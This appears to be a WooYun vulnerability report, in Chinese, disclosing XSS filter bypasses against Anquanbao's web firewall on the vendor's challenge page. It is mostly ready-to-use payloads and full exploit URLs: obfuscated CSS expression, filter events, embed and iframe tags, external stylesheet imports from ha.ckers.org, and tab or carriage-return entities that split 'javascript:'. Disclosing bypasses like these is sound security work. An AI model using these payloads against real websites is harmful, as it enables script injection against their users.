WooYun.org

活动地址：http://secaqb.anquanbao.org/xss.php
发现安全宝的防火墙只对一些简单xss代码进行了过滤，稍微变化下即可绕过。。
对可控的p div img style 等标签过滤不是仔细，类似css style的expression属性，只要稍微分解下即可绕过，以p 标签为例 http://secaqb.anquanbao.org/xss.php?gcode=<p style="xss:\0065xpression(alert(/piaoye/))"> 当然expression也可适用于img div iframe等标签，
还有个就是css的filter属性 <div%20style=width:1px;filter:glow%20onfilterchange=alert('piaoye')>aaa
资料地址： http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx
23日：
http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E
对flash的embed标签没有进行验证过滤，可进行csrf攻击 iframe 也无过滤
利用反斜杠干扰加载外部样式 <STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>
http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E
利用全角符号进行xss <DIV STYLE="width:ｅｘpreｓsion(alert('piaoye'));">
http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E
利用编码后的tab键 绕过对javascript的过滤 &#x09; &#x0A; &#x0D; 等 <IMG SRC="jav&#x09;ascript:alert('anyunix');">
http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E
这里其他标签也可以进行xss
<link rel="stylesheet" HREF="http://ha.ckers.org/xss.css"> urlencode
http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
<TABLE BACKGROUND="javascript:alert('XSS')">
这里我们利用上面的char码进行xss <TABLE BACKGROUND="java&#x0D;script:alert('piaoye')"> 即可执行
http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E
还有一些其他标签对javascript过滤的，也可以使用这个方法绕过。
就先弄这么多吧，若按条数算可有很多的。发现你们这个xss基本没啥过滤。。。